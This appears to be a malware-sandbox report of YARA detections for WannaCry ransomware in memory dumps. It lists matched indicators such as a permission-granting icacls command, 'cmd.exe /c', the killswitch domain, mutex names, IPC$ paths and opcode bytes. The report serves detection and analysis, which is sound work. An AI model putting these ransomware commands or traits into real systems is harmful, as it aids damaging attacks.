17.0.mssecsvc.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
17.2.mssecsvc.exe.252496c.9.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.2.mssecsvc.exe.252496c.9.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
17.2.mssecsvc.exe.252496c.9.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
17.2.mssecsvc.exe.252496c.9.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
6.0.mssecsvc.exe.7100a4.1.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
6.0.mssecsvc.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
6.0.mssecsvc.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
6.0.mssecsvc.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
17.0.mssecsvc.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.0.mssecsvc.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x4157c:$x3: tasksche.exe 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA 0x415d0:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x414d0:$s3: cmd.exe /c "%s" 0x73a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x34780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x3436c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
17.0.mssecsvc.exe.400000.0.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
17.0.mssecsvc.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
17.2.mssecsvc.exe.2501948.7.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.2.mssecsvc.exe.2501948.7.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x32520:$x1: icacls . /grant Everyone:F /T /C /Q 0x222ec:$x3: tasksche.exe 0x324fc:$x3: tasksche.exe 0x324d8:$x4: Global\MsWinZonesCacheCounterMutexA 0x32550:$x5: WNcry@2ol7 0x22357:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x82d0:$x7: mssecsvc.exe 0x222c4:$x8: C:\%s\qeriuwjhrf 0x32520:$x9: icacls . /grant Everyone:F /T /C /Q 0x82b8:$s1: C:\%s\%s 0x222d8:$s1: C:\%s\%s 0x32450:$s3: cmd.exe /c "%s" 0x649a4:$s4: msg/m_portuguese.wnry 0x1f60c:$s5: \\192.168.56.20\IPC$ 0xca01:$s6: \\172.16.99.5\IPC$ 0x25a26:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x25700:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x252ec:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
17.2.mssecsvc.exe.2501948.7.raw.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (based on rule by US CERT)	0xca4c:$s1: __TREEID__PLACEHOLDER__ 0xcae8:$s1: __TREEID__PLACEHOLDER__ 0xd354:$s1: __TREEID__PLACEHOLDER__ 0xe3b9:$s1: __TREEID__PLACEHOLDER__ 0xf420:$s1: __TREEID__PLACEHOLDER__ 0x10488:$s1: __TREEID__PLACEHOLDER__ 0x114f0:$s1: __TREEID__PLACEHOLDER__ 0x12558:$s1: __TREEID__PLACEHOLDER__ 0x135c0:$s1: __TREEID__PLACEHOLDER__ 0x14628:$s1: __TREEID__PLACEHOLDER__ 0x15690:$s1: __TREEID__PLACEHOLDER__ 0x166f8:$s1: __TREEID__PLACEHOLDER__ 0x17760:$s1: __TREEID__PLACEHOLDER__ 0x187c8:$s1: __TREEID__PLACEHOLDER__ 0x19830:$s1: __TREEID__PLACEHOLDER__ 0x1a898:$s1: __TREEID__PLACEHOLDER__ 0x1b900:$s1: __TREEID__PLACEHOLDER__ 0x1bb14:$s1: __TREEID__PLACEHOLDER__ 0x1bb74:$s1: __TREEID__PLACEHOLDER__ 0x1f244:$s1: __TREEID__PLACEHOLDER__ 0x1f2c0:$s1: __TREEID__PLACEHOLDER__
17.2.mssecsvc.exe.2501948.7.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x324fc:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x32524:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
12.0.mssecsvc.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
12.0.mssecsvc.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x4157c:$x3: tasksche.exe 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA 0x415d0:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x414d0:$s3: cmd.exe /c "%s" 0x73a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x34780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x3436c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
12.0.mssecsvc.exe.400000.0.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
12.0.mssecsvc.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
12.2.mssecsvc.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
12.2.mssecsvc.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x4157c:$x3: tasksche.exe 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA 0x415d0:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x414d0:$s3: cmd.exe /c "%s" 0x73a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x34780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x3436c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
12.2.mssecsvc.exe.400000.0.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
12.2.mssecsvc.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
17.2.mssecsvc.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.2.mssecsvc.exe.400000.0.unpack	JoeSecurity_Virut	Yara detected Virut	Joe Security
17.2.mssecsvc.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x4157c:$x3: tasksche.exe 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA 0x415d0:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x414d0:$s3: cmd.exe /c "%s" 0x73a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x34780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x3436c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
17.2.mssecsvc.exe.400000.0.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
17.2.mssecsvc.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
17.2.mssecsvc.exe.1fd6104.5.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.2.mssecsvc.exe.1fd6104.5.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x32520:$x1: icacls . /grant Everyone:F /T /C /Q 0x222ec:$x3: tasksche.exe 0x324fc:$x3: tasksche.exe 0x324d8:$x4: Global\MsWinZonesCacheCounterMutexA 0x32550:$x5: WNcry@2ol7 0x22357:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x82d0:$x7: mssecsvc.exe 0x222c4:$x8: C:\%s\qeriuwjhrf 0x32520:$x9: icacls . /grant Everyone:F /T /C /Q 0x82b8:$s1: C:\%s\%s 0x222d8:$s1: C:\%s\%s 0x32450:$s3: cmd.exe /c "%s" 0x649a4:$s4: msg/m_portuguese.wnry 0x1f60c:$s5: \\192.168.56.20\IPC$ 0xca01:$s6: \\172.16.99.5\IPC$ 0x25a26:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x25700:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x252ec:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
17.2.mssecsvc.exe.1fd6104.5.raw.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (based on rule by US CERT)	0xca4c:$s1: __TREEID__PLACEHOLDER__ 0xcae8:$s1: __TREEID__PLACEHOLDER__ 0xd354:$s1: __TREEID__PLACEHOLDER__ 0xe3b9:$s1: __TREEID__PLACEHOLDER__ 0xf420:$s1: __TREEID__PLACEHOLDER__ 0x10488:$s1: __TREEID__PLACEHOLDER__ 0x114f0:$s1: __TREEID__PLACEHOLDER__ 0x12558:$s1: __TREEID__PLACEHOLDER__ 0x135c0:$s1: __TREEID__PLACEHOLDER__ 0x14628:$s1: __TREEID__PLACEHOLDER__ 0x15690:$s1: __TREEID__PLACEHOLDER__ 0x166f8:$s1: __TREEID__PLACEHOLDER__ 0x17760:$s1: __TREEID__PLACEHOLDER__ 0x187c8:$s1: __TREEID__PLACEHOLDER__ 0x19830:$s1: __TREEID__PLACEHOLDER__ 0x1a898:$s1: __TREEID__PLACEHOLDER__ 0x1b900:$s1: __TREEID__PLACEHOLDER__ 0x1bb14:$s1: __TREEID__PLACEHOLDER__ 0x1bb74:$s1: __TREEID__PLACEHOLDER__ 0x1f244:$s1: __TREEID__PLACEHOLDER__ 0x1f2c0:$s1: __TREEID__PLACEHOLDER__
17.2.mssecsvc.exe.1fd6104.5.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x324fc:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x32524:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
17.2.mssecsvc.exe.2501948.7.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.2.mssecsvc.exe.2501948.7.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x2dd20:$x1: icacls . /grant Everyone:F /T /C /Q 0x1daec:$x3: tasksche.exe 0x2dcfc:$x3: tasksche.exe 0x2dcd8:$x4: Global\MsWinZonesCacheCounterMutexA 0x2dd50:$x5: WNcry@2ol7 0x1db57:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x76d0:$x7: mssecsvc.exe 0x1dac4:$x8: C:\%s\qeriuwjhrf 0x2dd20:$x9: icacls . /grant Everyone:F /T /C /Q 0x76b8:$s1: C:\%s\%s 0x1dad8:$s1: C:\%s\%s 0x2dc50:$s3: cmd.exe /c "%s" 0x601a4:$s4: msg/m_portuguese.wnry 0x1ae0c:$s5: \\192.168.56.20\IPC$ 0xb601:$s6: \\172.16.99.5\IPC$ 0x21226:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x20f00:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x20aec:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
17.2.mssecsvc.exe.2501948.7.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x2dcfc:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x2dd24:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
17.2.mssecsvc.exe.1fd20a4.2.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.2.mssecsvc.exe.1fd20a4.2.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x36580:$x1: icacls . /grant Everyone:F /T /C /Q 0x2634c:$x3: tasksche.exe 0x3655c:$x3: tasksche.exe 0x36538:$x4: Global\MsWinZonesCacheCounterMutexA 0x365b0:$x5: WNcry@2ol7 0x263b7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0xc330:$x7: mssecsvc.exe 0x26324:$x8: C:\%s\qeriuwjhrf 0x36580:$x9: icacls . /grant Everyone:F /T /C /Q 0xc318:$s1: C:\%s\%s 0x26338:$s1: C:\%s\%s 0x364b0:$s3: cmd.exe /c "%s" 0x68a04:$s4: msg/m_portuguese.wnry 0x2366c:$s5: \\192.168.56.20\IPC$ 0x10a61:$s6: \\172.16.99.5\IPC$ 0x29a86:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x29760:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x2934c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
17.2.mssecsvc.exe.1fd20a4.2.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x3655c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x36584:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
6.2.mssecsvc.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
6.2.mssecsvc.exe.400000.0.unpack	JoeSecurity_Virut	Yara detected Virut	Joe Security
